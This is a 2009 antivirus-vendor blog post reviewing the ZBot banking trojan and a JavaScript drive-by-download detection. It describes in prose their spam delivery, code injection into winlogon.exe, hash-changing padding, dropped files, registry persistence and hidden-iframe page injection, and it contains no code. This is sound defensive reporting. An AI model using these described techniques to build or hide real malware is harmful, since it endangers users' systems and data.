about the city contact us
search
 
 
 
 
 
 
Malware city / Blog / BitDefender weekly review – ZBot is still around
Print | Send on Yahoo! | PDF version | Feed RSS | Filed Under: WEEKLY REVIEW

BitDefender weekly review – ZBot is still around

Date: 06/26/2009
Author: Andrei Bereczki

ZBot will not stop spreading soon enough as it seems. It hasn't been long since the last time we wrote about this e-threat and here it is again, repacked, ready to roll out to the masses. We advise to keep your guard up and the spam filters updated, or else you might get hit.

Trojan.Spy.ZBot.UO

The malware comes with a common trick for the users: it has a different icon then a usual executable icon. In this case it's a *.chm file icon (Microsoft Compiled HTML Help File). We've also seen usage of Microsoft Excel and standard directory icons used by Zbot.

As for most Zbots, its infection vector is email spam.

This particular version of Zbot is actually nothing else but a repacked version of Trojan.Spy.ZBot.UI. It injects code in winlogon.exe allowing it to create files and connect to the Internet undetected. Making use of this, it creates a copy of itself into %windir%\system32\sdra64.exe, adding garbage to the executable so it has a different size and md5 hash, a rather shy attempt of av-evasion. It also creates a folder called lowsec in the same folder in which it will write 3 files containing encrypted data: local.ds, user.ds and user.ds.lll

In order to run at every system startup the Trojan makes changes to certain registry entries. I also marks it's presence on the computer by creating the following mutex: __SYSTEM__64AD0625__

 

Trojan.JS.PYV

This generic detection made by BitDefender stands for JavaScripts which try to exploit vulnerabilities outdated browsers or third party browser plugins like ActiveX controls for PDF viewing, Flash playback and others.

The idea of the script is to load malicious pages into beforehand specifically crafted pages for this purpose or initially clean but later attacked websites which have been modified to act as a medium.

The mechanics behind the attack is to inject JavaScript code into the clean page, which will have as a result the creation of a special iframe, which is invisible to the eye, but will practically load another page behind the page the victim is visiting at the moment.

That other page will most certainly contain several exploits for the above mentioned plugins and whichever succeeds will download malware to the affected PC without the users notice or consent. This type of download is called drive-by-download and the payload depends on the page that has been loaded by this JavaScript's code into the clean site.

Information in this article is available courtesy of BitDefender virus researchers: Lutas Andrei Vlad and Marius Vanta

Share our story:
DiggStumbleUpondel.icio.usYahooMyWebFurlGoogle
RELATED:

Comment on this:
Name:
Email:
Your email address will not be published!

Please enter the code from the image below.
The code is not case sensitive
Verification Image
Reload image
 
 
Calendar
March 2010
MoTuWeThFrSaSu
1234567
891011121314
15161718192021
22232425262728
293031    
« Feb March Apr »
CategoriesMISCELLANEOUS
WEEKLY REVIEW
VIRUSES DESCRIPTIONS
CONTEST
MALWARE HISTORY
HOW TO....
BOTNETS
ALERTS
SPAM REVIEW
Tag Claud
online word computer omelette worm rogue review data malware files security microsoft exploit trojan system software antivirus message conficker canadian infected messages virus windows twitter pharmacy bitdefender downadup file spam
RSS Feeds
Blogs And Comments RSS News
Malware City Powered by BitDefender © 2010 |  privacy policy   |  city map